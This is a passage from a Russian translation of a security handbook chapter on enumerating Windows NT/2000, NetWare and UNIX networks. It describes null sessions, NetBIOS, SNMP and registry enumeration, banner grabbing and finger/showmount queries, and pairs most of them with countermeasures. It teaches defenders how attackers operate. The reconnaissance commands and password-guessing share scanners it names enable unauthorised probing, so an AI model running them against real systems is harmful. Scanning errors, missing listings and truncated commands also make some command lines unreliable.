Резюме В данной главе мы рассмотрели средства и методы, предназначенные для осуществления ping-прослушивания (как с помощью протокола ICMP, так и с помощью TCP), сканирования портов и определения типа операционной системы. С помощью средств ping-прослушивания можно идентифицировать узлы сети, подключенные к Internet, что позволяет сузить область поиска потенциальных целей. Затем с помощью бесчисленного множества различных методов и средств TCP- и UDP-сканирования можно установить службы, которые запущены на этих узлах и находятся в состоянии ожидания запросов, а также сделать предположения о степени уязвимости исследуемых систем. И наконец, мы рассмотрели, как взломщик может использовать программное обеспечение, предназначенное для определения типа и номера версии операционной системы, под управлением которой работает исследуемый узел. В следующей главе вы увидите, что собранная до сих пор информация очень важна для того, чтобы осуществить сфокусированную атаку. |
Глава 3. ИНВЕНТАРИЗАЦИЯ
|
Инвентаризация Собрав полное "досье" на исследуемую сеть и "прощупав" систему ее защиты, хакер, скорее всего, на этом не остановится. Следующим шагом на пути к проникновению в систему будет получение информации о пользовательских учетных записях или плохо защищенных совместно используемых ресурсах. Для сбора такой информации существует много различных способов, которым дали общее название — инвентаризация (enumeration). В данной главе подробно рассматриваются основные методы, используемые в процессе инвентаризации.
Методика инвентаризации в значительной степени зависит от операционной системы (именно поэтому так важна информация, полученная на этапе сканирования портов и установления типа и версии операционной системы, о чем шла речь в главе 2). Зная, какая информация может заинтересовать хакера и насколько хорошо ваша система ее скрывает, вы можете предпринять ответные меры, которые позволят защитить самые уязвимые участки. |
Инвентаризация Windows NT/2000 За все время своего существования Windows NT заслужила репутацию системы, которая предоставляет общедоступную информацию по любому удаленному запросу. В основном это осуществляется через протоколы передачи данных CIFS/SMB (Common Internet File System/Server Message Block), от которых в значительной степени зависит работа сетевых служб. Хотя в Win 2000 имеется возможность автономного использования протокола TCP/IP без протокола NetBIOS, она получила в наследство все недостатки своей предшественницы. Система Win 2000 содержит также несколько новых возможностей, которые могут заинтересовать случайного сборщика информации. В данной главе будут обсуждаться и старые, и новые особенности, а также рекомендуемые действия, с помощью которых можно защитить ценную информацию еще до того момента, когда кто-либо соберет достаточное количество информации для крупномасштабной атаки. Windows NT/2000 Hacking Kit Начиная с версии Windows NT 3.1 компания Microsoft предлагает за отдельную плату дополнительный комплект документации и компакт-диск, на котором собрано множество утилит для администрирования сетей на базе Windows NT — Windows NT Resource Kit (как в варианте Workstation, так и в варианте Server). В комплект NTRK (так мы будем называть его далее в этой книге) входит обширная подборка различных утилит, начиная от частично реализованного интерпретатора популярного языка сценариев Perl, позволяющего перенести на платформу NT многие популярные утилиты UNIX, и заканчивая утилитами удаленного администрирования, не входящими в стандартный комплект поставки Windows NT. Без данного комплекта не может обойтись ни один серьезный администратор NT. Интерпретатор языка Perl, имеющийся в комплекте NTRK, предоставляет не такие широкие возможности, как комплект для Windows от компании ActiveState, который можно найти по адресу http://www.activestate.com. В комплект W2RK компанией Microsoft включена версия ActivePerl Build 521 компании ActiveState. Если вы планируете использовать язык Perl в Windows, мы советуем обратиться именно к этой реализации, поскольку многие из рассматриваемых в книге утилит, реализованных на этом языке, в случае применения интерпретатора Perl из набора NTRK работают некорректно.Хотя сознательным администраторам NT/2000 мы настоятельно рекомендуем приобретать все комплекты NTRK и отслеживать все новшества, не устанавливайте их на действующих серверах. В противном случае вы обратите оружие против себя! Для обеспечения требуемой функциональности устанавливайте лишь наиболее важные утилиты. Для хранения поместите на съемный или сетевой диск все утилиты NTRK и используйте их лишь при необходимости.
Нулевые соединения: "Священный Грааль" инвентаризации Как уже упоминалось, системы Windows NT/2000 имеют ахиллесову пяту при использовании протоколов CIFS/SMB и NetBIOS в режиме, используемом по умолчанию. В состав стандартов CIFS/SMB и NetBIOS входят программные интерфейсы, возвращающие различную информацию о компьютере через порт TCP с номером 139. Такие данные смогут получить даже те пользователи, которые не были аутентифицированы. Первым шагом на пути получения удаленного доступа к этим интерфейсам является создание простого, без аутентификации, соединения с системой NT/2000 с помощью так называемого нулевого сеанса (null session). Предполагается, что в результате ранее выполненного сканирования портов было установлено, что TCP-порт 139 находится в состоянии ожидания запросов. Такое соединение можно установить с помощью следующей команды. Нулевой сеанс: контрмеры При установке нулевого соединения требуется доступ к TCP-порту 139, так что наиболее правильный путь предотвращения такой опасности состоит в фильтрации запросов по протоколу NetBIOS к портам TCP и UDP с номерами от 135 до 139 по всему периметру сетевых устройств управления доступом. Необходимо также запретить использование протокола NetBIOS поверх TCP/IP и на отдельных узлах, отсоединив клиент WINS (TCP/IP) от соответствующего интерфейса с помощью аплета Network панели управления. В системе Windows 2000 для этого нужно запустить аплет соответствующего сетевого подключения, открыть диалоговое окно Advanced TCP/IP Settings, перейти во вкладку WINS и отключить режим Disable NetBIOS Over TCP/IP. В системе Win 2000 используется еще порт 8MB с номером 445, который позволяет получить аналогичную информацию. Более подробные сведения и описание методов защиты содержатся в главе 6. Начиная с третьего сервисного пакета системы NT компания Microsoft предложила механизм, позволяющий предотвратить опасность извлечения важной информации с помощью нулевых соединений без отключения режима использования протокола NetBIOS поверх TCP/IP (хотя мы по-прежнему рекомендуем сделать это, если в службах NetBIOS нет необходимости). Этот механизм был назван RestrictAnonymous — по названию соответствующего параметра системного реестра. Для его использования выполните следующие действия.
Одним из самых примечательных исключений из этого правила является утилита sid2user (описываемая в разделе "Инвентаризация Пользователей И Групп NT/2000"), которая продолжает функционировать даже при включенном режиме RestrictAnonymous. Более подробную информацию можно найти в статье Q143474 системы Knowledge Base компании Microsoft по адресу http://search.support.microsoft.com. Для получения более подробного технического описания можно обратиться к статье о хакинге служб NetBIOS CIFS: Common insecurities Fail Scrutiny Хобита, которую можно найти по адресу http://www.avian.org или в документах RFC 1001 и 1002, где содержится спецификация передачи данных по протоколам NetBIOS и TCP/UDP. |
Инвентаризация сетевых ресурсов NT/2000 Первое, что может попробовать осуществить удаленный взломщик после скрупулезного изучения сети, — это получить представление об имеющихся в ней ресурсах. Сначала мы рассмотрим инвентаризацию ресурсов NetBIOS, а затем перейдем к инвентаризации служб TCP/IP, которые в большинстве случаев функционируют в системах NT/2000. Инвентаризация NetBIOS Средства и приемы, которые можно применять к изучению ресурсов сети с протоколом NetBIOS, можно найти без труда — большинство из них встроено в саму операционную систему! Именно с них мы и начнем. Затем вы познакомитесь с некоторыми утилитами сторонних производителей. Возможные контрмеры лучше рассматривать в самом конце обсуждения, поскольку одновременно решить все проблемы гораздо проще. Инвентаризация доменов NT/2000 с помощью команды net view В качестве одного из самых ярких примеров встроенных инструментов можно привести команду net view. Это чрезвычайно простая утилита командной строки систем NT/2000, которая позволяет просмотреть все домены сети, а также практически все компьютеры доменов. Вот как выполнить инвентаризацию доменов в сети с использованием команды net view: C:\>net view /domain С помощью следующей команды будут перечислены все компьютеры определенного домена. C:\>net view /domain:corleone He забывайте о том, что можно использовать информацию, полученную с помощью ping-прослушивания (глава 2), и подставить IP-адреса вместо имен NetBIOS отдельных компьютеров. Обычно IP-адреса и имена NetBIOS взаимозаменяемы (например, \\192.168.202.5 эквивалентно \\SERVER_NAME). Для удобства взломщики зачастую добавляют соответствующие записи с ключевым словом #PRE В свой файл %systemroot%\system32\drivers\etc\LMHOSTS, а затем запускают в командной строке команду nbtstat -R, чтобы перезагрузить буфер таблицы имен. С этого момента при атаке можно без проблем использовать имя NetBIOS, которое автоматически будет преобразовываться в соответствующий IP-адрес, заданный в файле LMHOSTS.
Получение дампа таблицы имен NetBIOS с помощью команд nbtstat и nbtscan Другой мощной встроенной утилитой является nbtstat, которая позволяет получить таблицу имен NetBIOS удаленной системы. Как видно из следующего примера, в этой таблице содержится важная информация. C:\>nbtstat -A 192.168.202.33 Фрагмент листинга указывает, что с помощью команды nbtstat было получено имя компьютера (SERVR9), домен, в котором он расположен (9DOMAIN), имена зарегистрированных пользователей (ADMINISTRATOR), все запущенные службы (inet-Services) и МАС-адрес. Всю эту информацию можно узнать по кодам службы NetBIOS (числа из двух цифр, расположенные справа от имени), частично представленным в табл. 3.1. Таблица 3. 1. Стандартные коды служб NetBIOS
Двумя основными недостатками команды nbtstat являются возможность ее применения к одному узлу одновременно и несколько непонятные выходные данные. Обоих этих недостатков лишена свободно распространяемая утилита nbtscan Аллы Безручко (Alia Bezroutchko), которую можно найти по адресу http://www.abb.aha. ru/software/nbtscan.html. Эта утилита позволяет быстро выполнить те же действия, что и команда nbtstat, над всей сетью и при этом предоставляет прекрасно отформатированные результаты. D:\Toolbox\nbtscanl02> Утилита nbtscan позволяет быстро получить данные об узлах сети, на которых используется система Windows. Попробуйте запустить ее для сети класса С из Internet, и вы поймете, что именно мы хотели сказать. Инвентаризация контроллеров доменов Для того чтобы проникнуть в структуру сети Windows NT немного глубже, понадобится инструмент, входящий в комплект NTRK. В следующем примере мы увидим, как с помощью средства NTRK nltest можно узнать, какие контроллеры доменов являются первичными (РОС — Primary Domain Controller), а какие — вторичными (ВDC — Backup Domain Controller). C:\> nltest /dclist:corleone Для дальнейшего продвижения вперед нам необходимо воспользоваться нулевым соединением. (Помните о нем? Если нет, то вернитесь к началу данной главы.) Достаточно установить нулевой сеанс с одним из узлов представляющего интерес домена, чтобы затем с помощью команды вида nltest /server :<имя_сервера>, а также параметра /trusted_ domains узнать всю информацию о доменах NT, в которые входит данный компьютер. Инвентаризация совместно используемых ресурсов NetBIOS с помощью команды net view и утилит NTRK Установив нулевой сеанс, можно снова взяться за старую добрую команду net view и провести инвентаризацию ресурсов удаленной системы, предоставленных для совместного доступа: C:\>net view \\vito В состав комплекта NTRK входят три утилиты, которые могут оказаться полезными для инвентаризации совместно используемых ресурсов, — rmtshare, srvcheck и srvinfo (с параметром -s). Утилита rmtshare выводит результат примерно в том же виде, что и команда net view. Утилита srvcheck отображает сведения о совместно используемых ресурсах и авторизованных пользователях, включая скрытые ресурсы. Однако для этого необходимо получить доступ к удаленной системе в качестве привилегированного пользователя. Наконец, утилита srvinfo с параметром -s позволяет просмотреть перечень совместно используемых ресурсов, а также получить об исследуемой системе множество другой полезной информации. Инвентаризация совместно используемых ресурсов NetBIOS с помощью утилиты DumpSec (ранее DumpACL) Одним из лучших инструментов для инвентаризации совместно используемых ресурсов NT (причем этим возможности .не ограничиваются), является пакет DumpSec (ранее DumpACL), основное диалоговое окно которого показано на рис. 3.1. Он распространяется бесплатно компанией Somarsoft (http://www.somarsoft.com). Вряд ли можно найти другой инструмент, который заслуживал бы такого же внимания администратора NT. Программа DumpSec выполняет чрезвычайно широкий аудит, начиная от разрешений на использование файловой системы удаленного узла и заканчивая перечнем запущенных на ней служб. На рис. 3.1 показан пример работы программы DumpSec для получения информации о совместно используемых ресурсах удаленной системы. Основная информация о пользователях может быть получена даже через нулевое соединение. Кроме того, эту программу можно запускать из командной строки, что позволяет без особых проблем применять ее при автоматизации процесса сбора и обработки информации, а также при написании сценариев.
Поиск совместно используемых ресурсов с помощью утилит Legion и NAT Открытие нулевого сеанса и использование описанных выше инструментов в ручном режиме прекрасно подходят для прямого вторжения, однако большинство хакеров предпочитают использовать сканер NetBIOS, чтобы быстро проверить целую сеть на предмет наличия незащищенных ресурсов. Одной из наиболее популярных утилит является Legion (ее можно найти во многих архивах Internet), диалоговое окно которой показано на следующем рисунке. Утилита Legion может обследовать сеть класса С и представить в своем окне перечень всех обнаруженных совместно используемых ресурсов. Ее версия 2.1 поддерживает режим подбора пароля "в лоб", при использовании которого утилита пытается подключиться к определенному ресурсу с помощью предоставленного пользователем списка паролей. Более подробная информация о подборе паролей Windows 9x и Windows NT приведена в главах 4 и 5 соответственно.
Еще одним популярным сканером совместно используемых ресурсов Windows является утилита NetBIOS Auditing Tool (NAT), работа которой основывается на коде, написанном Эндрю Тридгеллем (Andrew Tridgell). Эту утилиту можно найти на Web-узле книги по адресу http://www.hacking exposed.com. Участники ныне уже не существующей группы Rhino9 Security Team Неон Сурж (Neon Surge) и Хамелеон (Chameleon) написали графический интерфейс для утилиты NAT (рис. 3.2). Утилита NAT не только находит совместно используемые ресурсы, но и пытается подключится к ним с помощью списков пользовательских имен и паролей. Другие средства инвентаризации сети NT/2000 Необходимо упомянуть еще несколько программ, предназначенных для инвентаризации ресурсов NT: epdump компании Microsoft (ее можно найти по адресу http: //www.ntshop.net/security/tools/def.htm), getmac и netdom (из комплекта NTRK), а также утилиту netviewx Джеспера Лорицена (Jesper Lauritsen) http://www.ibt.ku.dk/jesper/NTtools). Утилита epdump посредством обращения :< интерфейсу RPC отображает перечень служб, связанных с IP-адресами и номерами портов (при этом результаты отображаются далеко не лучшим образом). Утилита getmac, используя нулевой сеанс, отображает МАС-адреса и имена устройств, присвоенных сетевым адаптерам удаленных узлов. Эта информация имеет особый интерес только для хакера, который ищет систему с несколькими сетевыми адаптерами. Утилита netdom более полезна, поскольку она выдает информацию обо всех связанных доменах, включая сведения о принадлежности к домену и его резервных контроллерах. Утилита netviewx также является мощным инструментом, позволяющим получить информацию об узлах домена и запущенных на них службах. Мы часто используем netviewx для проверки наличия службы удаленного доступа NT (RAS— Remote Access Service), чтобы получить представление о количестве серверов в сети, обеспечивающих удаленный доступ. Для этого можно воспользоваться представленной ниже командой. С помощью параметра -T задается имя исследуемого домена, а параметр -т позволяет задать тип компьютера или службы. C:\>netviewx -D CORLEONE -Т dialin_server Имена служб, запущенных на этом сервере, представлены между символами %. Кроме того, утилита netviewx является хорошим средством для поиска компьютера, который не является контроллером домена. Это не лишено смысла, поскольку вероятность того, что такой компьютер не будет иметь надежной защиты гораздо выше, чем у контроллера домена. Универсальное средство инвентаризации: утилита еnum Эта утилита была разработана группой Razor компании Bindview. В ней реализованы возможности всех других средств инвентаризации NetBIOS. Разработчики назвали эту программу enum, и это очень подходит для данной главы. Утилиту enum можно найти по адресу http://razor.bind-view.com. В приведенном ниже листинге представлены возможные Параметры командной строки. Из листинга видно, насколько всесторонние возможности предоставляет эта утилита. D:\Toolbox>enum Утилита enum позволяет автоматически устанавливать и завершать нулевой сеанс. Отдельного упоминания заслуживает параметр -Р, предоставляющий информацию о принятой политике шифрования паролями. С его помощью взломщики могут оценить возможность удаленного определения пользовательских паролей (с помощью параметров -о, -и и -£) до того момента, как будет найден наиболее легкий из них. Более подробно утилита еnum будет рассматриваться в следующем разделе, посвященном инвентаризации учетных записей пользователей NT/2000. Инвентаризация NetBIOS: контрмеры Практически во всех рассмотренных выше приемах задействуется механизм передачи данных NetBIOS, так что при запрещении доступа к портам TCP и UDP с 135 до 139 все попытки получения информации окажутся неудачными. Для этого лучше всего заблокировать доступ к этим портам с использованием маршрутизатора, брандмауэра или любого другого устройства управления доступом. В разделе, посвященном нулевым сеансам, вы узнали, как запретить использование протокола NetBIOS поверх TCP/IP и нужным образом настроить параметр системного реестра RestrictAnonymous. Это позволит предотвратить опасность извлечения важных данных посредством установки анонимных соединений. Однако правильное конфигурирование параметра RestrictAnonymous не способно заблокировать запросы, сгенерированные с использованием команд net view и nbtstat. Кроме того, не забывайте о том, что в системе Win 2000 некоторую информацию можно получить и через порт TCP/UDP с номером 445, так что доступ к этом порту также целесообразно заблокировать. Инвентаризация SNMP NT/2000 Даже если вы сделали все, чтобы предотвратить доступ к службам NetBIOS, с компьютера NT/2000 по-прежнему можно получить аналогичную информацию, если на нем запушен агент SNMP (Simple Network Management Protocol). Доступ к этому агенту можно получить с помощью строки доступа public, используемой по умолчанию. В таких случаях инвентаризация пользователей NT через протокол SNMP с помощью программы sranputil из комплекта NTRK превращается в увеселительную прогулку как в прямом (от английского слова walk ("пройтись"), фигурирующего в качестве параметра), так и в переносном смысле. С:\>snmputil walk 192.168.202.33 В приведенном выше примере запуска утилиты snmputil последний параметр (.1.3.6.1.4.1.77.1.2.25)— это идентификатор объекта (OID — Object Identifier), который в соответствии с требованиями протокола SNMP определяет ветвь информационной управляющей базы (MIB — Management Information Base) компании Microsoft. База MIB — это иерархическое пространство имен, поэтому "прогулка" по всему дереву (т.е. использование менее точного значения, например .1.3.6.1.4.1.77) приведет к получению слишком больших объемов информации. Запомнить все номера довольно сложно, поэтому взломщик, скорее всего, ограничится их строковыми эквивалентами. Ниже перечислены некоторые сегменты MIB, с помощью которых можно получить соответствующую информацию (для этого необходимо добавить тот или иной сегмент к .iso.оrg.dod.internet.private.enterprises.lanmanager.lanmgr-2).
Конечно, можно избавиться от рутинной работы по вводу столь длинных параметров. Для этого достаточно найти в Internet (например, по адресу http: //www.solar winds.net) прекрасный SNMP-броузер с именем IP Network Browser, предоставляющий всю перечисленную выше информацию в наглядной форме. На рис. 3.3 показано, как программа IP Network Browser проверяет сеть на наличие в ней компьютеров, на которых используется протокол SNMP.
Контрмеры: защита протокола SNMP Самый простой способ предупреждения такой деятельности состоит в удалении агента SNMP или в отключении службы SNMP с помощью аплета Services панели управления. Если данный вариант вам не подходит, то как минимум убедитесь в том, что доступ к данной службе правильно настроен и используется строка доступа private, а не установленная по умолчанию строка public. Можно также отредактировать системный реестр, чтобы разрешить только санкционированный доступ к службе SNMP и запретить передачу информации NetBIOS о системе. Для этого запустите программу regedt32 и найдите параметр HKLM\ SystemNCurrentControlSet\Services\ SNMP\Paramaters\ValidConununities. Выберите команду Permissions>Security и установите в открывшемся диалоговом окне значение таким образом, чтобы разрешить доступ только аутентифицированным пользователям системы. Затем перейдите к разделу HKLM\System\CurrentControlSet\ Services\SNMP\ ParametersNExtensionAgents, удалите значение, содержащее строку LANManagerMIB2Agent, а затем переименуйте остальные параметры, чтобы восстановить правильную последовательность. Например, если вы удалили параметр с номером 1, переименуйте параметры 2, 3, 4 и т.д. в 1, 2, 3 и т.д. Перенос зоны DNS Win 2000 Как было показано в главе 1, одной из основных целей предварительного сбора информации является получение данных о системе доменных имен (DNS), используемой в Internet, и преобразование IP-адресов узлов в дружественные имена, такие как amazon.com. Поскольку пространство имен активного каталога основывается на использовании службы DNS, компания Microsoft полностью обновила реализацию сервера DNS в Win 2000, чтобы удовлетворить всем новым потребностям. D:\Toolbox>nslookup Согласно спецификации RFC 2052, запись SRV имеет следующий формат. Блокирование переноса зоны DNS Win 2000 К счастью, в системе Win 2000 служба DNS реализована таким образом, что можно без проблем ограничить перенос зоны, как показано ниже на рисунке. На нем представлено диалоговое окно свойств зоны поиска в прямом направлении (в данном случае для сервера labf arce. org). Для того чтобы открыть это окно, запустите консоль управления Computer Management и откройте элемент Server Applications and Services\DNS\<имя_cepверa>\Forward Lookup Zones\[имя_зоны], а затем выберите команду Properties. Нетрудно догадаться, что по умолчанию в системе Windows 2000 разрешен перенос зоны по любому запросу. Можно полностью запретить перенос зоны, просто сбросив флажок Allow zone transfers, однако более реалистично было бы предположить, что на резервных серверах DNS информация должна регулярно обновляться. Так что в диалоговом окне свойств зоны можно установить и менее ограничивающий режим. |
Инвентаризация приложений и идентификационных маркеров Выше были рассмотрены вопросы инвентаризации сети и учетных записей пользователей. При этом для достижения требуемого результата применимы различные средства, встроенные в саму операционную систему. А как насчет получения списка приложений, установленных на компьютере NT/2000? Подобная информация способна значительно расширить знания об исследуемой системе. Процесс подключения к удаленным приложениям и наблюдение за результатами их использования часто называется сбором маркеров (banner grabbing) и может оказаться неожиданно информативным для взломщиков. Если говорить кратко, то в процессе сбора маркеров можно идентифицировать программное обеспечение, запущенное на сервере, и его версию. А этого во многих случаях будет вполне достаточно, чтобы начать поиск уязвимых мест. Основы процесса сбора маркеров: утилиты telnet и netcat Испытанным и надежным инструментом инвентаризации идентификационных маркеров и приложений как в мире NT, так и в мире UNIX, является утилита telnet. Установив с ее помощью соединение с известным портом исследуемого сервера, нажмите несколько раз клавишу <Enter> и посмотрите полученный результат. C:\>telnet www.corleone.com 80 Этот метод срабатывает для многих популярных приложений, использующих указанный порт (попробуйте его для порта HTTP 80, SMTP 25 или FTP 21, который особенно информативен при исследовании сервера под управлением Windows). C:\>nc -v www.corleone.com 80 В таких ситуациях ввод даже небольшого количества данных приводит к получению отклика со стороны удаленного узла. В данном случае, при нажатии клавиши <Enter> мы получим следующие результаты. НТТР/1.1 400 Bad Request Полученная информация способна существенно сузить область поиска подходов к проникновению в исследуемую систему. Теперь, когда известен производитель и версия программного обеспечения Web-сервера, взломщики могут сосредоточиться на методах, специфичных для данной платформы, и перебирать хорошо проверенные приемы до тех пор, пока один из них не достигнет цели. Таким образом, время начинает работать на злоумышленника, а не в пользу администратора. Мы еще не раз остановимся на методах применения утилиты netcat, в том числе и для извлечения дополнительной информации при инвентаризации UNIX. Этот вопрос будет рассматриваться в следующем разделе. Сбор идентификационных маркеров NT/2000: контрмеры Защита от такого рода попыток проведения инвентаризации требует от администратора некоторой доли изобретательности. Однако мы не можем определить с достаточной степенью определенности, насколько важна для взломщиков информация о приложениях и службах, работающих в вашей сети. Инвентаризация системного реестра NT/2000 Другой механизм получения информации о приложениях NT/2000 подразумевает получение копии содержимого системного реестра исследуемого компьютера. Практически все современные приложения, корректно установленные на компьютере NT, оставляют более или менее заметные "следы" в системном реестре. Требуется лишь знать, где производить поиск требуемой информации. Кроме того, злоумышленник, получивший доступ к системному реестру, может почерпнуть из него немало сведений о пользователях и параметрах конфигурации. Запасшись изрядной долей терпения, в лабиринте ульев можно обнаружить сведения, которые позволят получить доступ к нужной информации. К счастью, в системе NT/2000 доступ к системному реестру по умолчанию разрешен лишь администраторам (по меньшей мере в ее версии для сервера). Таким образом, описываемый ниже метод обычно неприменим при использовании анонимных нулевых соединений. Однако из этого правила существует одно исключение, когда в ключе HKLM\System\Current-ControlSet\Control\SecurePipeServer\ Winreg\AllowedPaths заданы другие параметры, открытые для доступа посредством нулевых сеансов. В этом случае по умолчанию доступ разрешен к ключу HKLM\software\Microsoft\windowsNT\ CurrentVersion. С:\> regdmp -m \\192.168.202.33 Программа DumpSec позволяет получить результат в более привлекательной форме (рис. 3.6), однако в большинстве случаев он ничем не отличается от результатов применения утилиты regdmp. В отчете утилиты DumpSec содержатся сведения обо всех службах и драйверах ядра Win32 удаленной системы, как работающих, так и не работающих (в соответствии с установленными разрешениями). Полученная информация может подсказать злоумышленнику, в каком направлении необходимо сосредоточить усилия при планировании вторжения и его реализации. Не забывайте о том, что при использовании программы DumpSec требуется открытие нулевого сеанса.
Контрмеры против сбора идентификационных маркеров и инвентаризации системного реестра Убедитесь, что системный реестр заблокирован и к нему нельзя получить доступ с использованием удаленных соединений. Для этого необходимо проверить возможность удаленного доступа к ключу HKLM\System\CurrentControlSet\SecurePipe Servers \winreg и всем связанным с ним подключам. Если этот ключ присутствует, то по умолчанию удаленный доступ к реестру разрешен лишь администраторам. Этот ключ по умолчанию присутствует только в версии Win NT/2000, предназначенной для сервера, но не для рабочей станции. В дополнительных подключах задаются определенные пути системного реестра, разрешающие доступ независимо от политики обеспечения безопасности, принятой для ключа winreg. Более подробная информация об этом приведена в статье Q155363 базы данных компании Microsoft, которую можно найти по адресу http://search.support.microsoft.com. Кроме того, воспользуйтесь каким-нибудь хорошим средством, например программой DumpSec, и удостоверьтесь в отсутствии утечки информации. |
Позвольте сценариям выполнить всю работу Вы подробно познакомились с ручными методами, которые взломщик может предпринять для инвентаризации сети, пользователей и получения данных о приложениях. Вполне понятно, что многие после прочтения материала, приведенного выше, забеспокоились и сразу же приступили к тестированию своих сетей на предмет поиска уязвимых мест. Однако это может оказаться трудноразрешимой задачей, если ваша сеть большого размера с множеством серверов. К счастью, большинство из описанных в данном разделе средств можно запускать из командной строки и, следовательно, легко автоматизировать их использование с помощью простых командных сценариев или других приемов. C:\>for /L %i Полученные результаты можно сократить, подав их на вход фильтра и оставив таким образом лишь список имен пользователей. Конечно, среда написания сценариев не ограничивается лишь командной оболочкой системы NT. Для этих целей удобно пользоваться также языками Perl, VBScript или другими средствами. Еще стоит упомянуть о том, что с помощью приведенного сценария можно успешно извлечь список пользователей, если на исследуемом узле открыты TCP-порты 139 или 445, а также не установлено значение для параметра RestrictSnonymous. |
Инвентаризация Novell Система Windows NT/2000 не одинока в наличии такого "порока", как нулевой сеанс. У сетевой операционной системы Novell NetWare имеется еще более серьезная проблема. Она состоит в том, что NetWare практически не заботится о защите информации, предоставляя ее кому угодно без какой-либо аутентификации сервером или деревом. Серверы NetWare 3.x и 4.x (с включенным контекстом Bindery (связки)) имеют так называемый изъян "присоединения" (attach), позволяющий любому желающему получить информацию о серверах, деревьях, группах, принтерах и пользовательских именах без регистрации на каком-либо сервере. В данном разделе мы покажем на практике, как это сделать, а затем дадим рекомендации по устранению этих недостатков. |
Сетевое окружение Первый этап инвентаризации сети NetWare состоит в получении данных о соединенных друг с другом серверах и деревьях. Это можно сделать различными способами, однако проще всего воспользоваться средством Network Neighborhood систем Windows 95/98/NT. Эта удобная утилита просмотра сетевых ресурсов обеспечивает возможность опрашивания всех серверов NetWare и деревьев NDS, с которыми имеется физическое соединение (рис. 3.7), хотя необходимо отметить, что вы не сможете просмотреть структуру дерева, не зарегистрировавшись в самом дереве. Конечно, данный факт сам по себе не угрожает информации, однако он показывает, что если каждый шаг можно выполнить столь просто, то и вся дистанция не покажется такой уж сложной.
Соединения с использованием клиента Client32 Программа управления службами Novell NetWare Services, представленная пиктограммой в системной области панели задач, позволяет управлять подключениями к NetWare с помощью команды NetWare Connections, как показано ниже.
Просмотр серверов NetWare с помощью On-Site Admin Не проходя аутентификации ни на одном сервере, можно просмотреть состояние любого сервера сети, воспользовавшись утилитой Novell On-Site Admin (ftp://ftp.cdrom.com). Вместо широковещательной рассылки сообщений эта утилита отображает сведения о серверах, хранящиеся в локальном буфере утилиты просмотра сетевого окружения. Эта утилита периодически обновляет свой буфер, рассылая по сети широковещательные сообщения серверам' NetWare. На рис. 3.9 показан пример того, как много информации можно получить с помощью утилиты On-Site Admin.
Программа On-Site Admin позволяет выполнять также и анализ, как показано на рис. 3.10. Выбрав сервер и щелкнув на кнопке Analyze, можно получить исчерпывающую информацию о томе NetWare.
|
Просмотр дерева с помощью утилиты On-Site Admin С помощью утилиты On-Site Admin можно также просмотреть всю информацию большинства деревьев NDS вплоть до их листьев. В этом случае клиент Client32 просто подключается к выбранному в дереве серверу (см. рисунок выше). Возможно это потому, что по умолчанию NetWare 4.x позволяет просматривать дерево любому желающему. Эту опасность можно устранить, добавив в корень дерева фильтр наследования прав (IRF — inheritance rights filter). Содержащаяся в дереве NDS информация является очень важной, поэтому нельзя разрешать просматривать ее кому попало, поскольку при его просмотре можно получить сведения о пользователях, группах, серверах и томах (рис. 3.11).
Получив всю информацию, о которой говорилось в данном разделе, злоумышленник может перейти к активным действиям по проникновению в систему, о которых мы поговорим в главе 7. |
Инвентаризация UNIX Большинство современных реализаций системы UNIX основываются на стандартных средствах обеспечения сетевой безопасности протокола TCP/IP. Благодаря этому они не так щедро раздают всем желающим информацию о сети, как система NT, в которой используется унаследованный от предыдущих версий интерфейс NetBIOS, или система NetWare, работа которой основывается на собственном механизме безопасности компании Novell. Естественно, это вовсе не означает, что система UNIX является неуязвимой, а ее сетевые ресурсы не могут подвергнутся инвентаризации. Все зависит от конфигурационных параметров системы. Например, службы RFC (Remote Procedure Call — удаленный вызов процедур), N1S (Network Information Service — сетевая информационная служба) и NFS (Network File System — сетевая файловая система), преимущества которых очень часто используют разработчики, являются излюбленными "мишенями" для взломщиков на протяжении уже многих лет. Ниже вы познакомитесь с некоторыми классическими методами инвентаризации UNIX (другими словами, старые и проверенные способы, которые, по-видимому, практически всегда будут срабатывать). Инвентаризация сетевых и совместно используемых ресурсов UNIX Лучшими источниками информации о сети UNIX являются базовые методы исследования стека протоколов TCP/IP, которые рассматривались в главе 2. Среди других средств можно выделить утилиту showmount, которую можно использовать для инвентаризации экспортируемых в сети файловых систем NFS. Например, предположим, что в результате сканирования стало известно, что на исследуемом компьютере в состоянии ожидания запросов находится порт 2049 (NFS). В этом случае с помощью утилиты showmount можно выяснить, какие именно каталоги являются совместно используемыми. showmount -e 192.168.202.34 Использование параметра -е позволяет получить список экспортируемых файловых систем сервера NFS. К сожалению, архитектура NFS в данном случае не позволяет противопоставить каких-либо защитных мер запросам такого рода. Можно лишь посоветовать, чтобы доступ к экспортируемой файловой системе выполнялся в соответствии с установленными разрешениями (операции чтения и записи должны быть разрешены только для строго определенных узлов), а доступ к NFS блокировался бы извне с помощью брандмауэра (порт 2049). Запросы утилиты showmount тоже можно регистрировать в системе. Это облегчает обнаружение взломщика. Инвентаризация пользователей и групп UNIX Возможно, самым старым приемом инвентаризации учетных записей пользователей, описанных в данной книге, является утилита finger. Эта утилита предоставляла простой и удобный способ получения информации о пользователях удаленного узла еще в те времена, когда сеть Internet не была настолько большой и простой в использовании. Мы упоминаем здесь об этой утилите в основном для того, чтобы акцентировать ваше внимание на основных способах ее использования. Многие средства проникновения в сеть по-прежнему базируются на использовании этой утилиты, поскольку нерадивые системные администраторы зачастую запускают системный процесс fingerd без каких-либо мер обеспечения безопасности. Как и прежде, мы предполагаем, что в процессе сканирования портов была получена информация о том, что на исследуемом узле запущена служба finger (порт 79). [root$]finger -I @target.hackme.com Команда finger 0@имя-узла также позволяет получить интересный результат. [root$]finger 00192.168.202.34 Как легко заметить, большая часть информации, которая отображается утилитой finger, не имеет особого значения (она выбирается из соответствующих полей файла /etc/password). Можно сказать, что с точки зрения безопасности самой опасной является информация об именах пользователей, зарегистрированных в системе, а также о времени, в течение которой пользователь не выполняет каких-либо операций (idle). Это поможет хакеру определить, кто в данный момент "присматривает" за машиной (возможно, пользователь root?) и насколько внимательно он это делает. Некоторая дополнительная информация может использоваться при попытке проникновения в сеть с помощью приемов социальной инженерии. (Социальная инженерия (social engineering) — термин из словаря хакера, обозначающий попытку с помощью психологических приемов установить контакт с нужными людьми с целью получения от них информации для проникновения в систему. Более подробная информация об этом содержится в главе 14, "Расширенные методы".) Как показано в этом примере, пользователи, которые помещают в свой рабочий каталог файлы .plan или .project, могут дать очень хорошую наводку хакеру (содержимое этих файлов выводится командой finger). rwho 192.168.202.34 При использовании параметра -1 утилита rusers позволяет получить более подробную информацию. Кроме сведений о пользователях она предоставляет 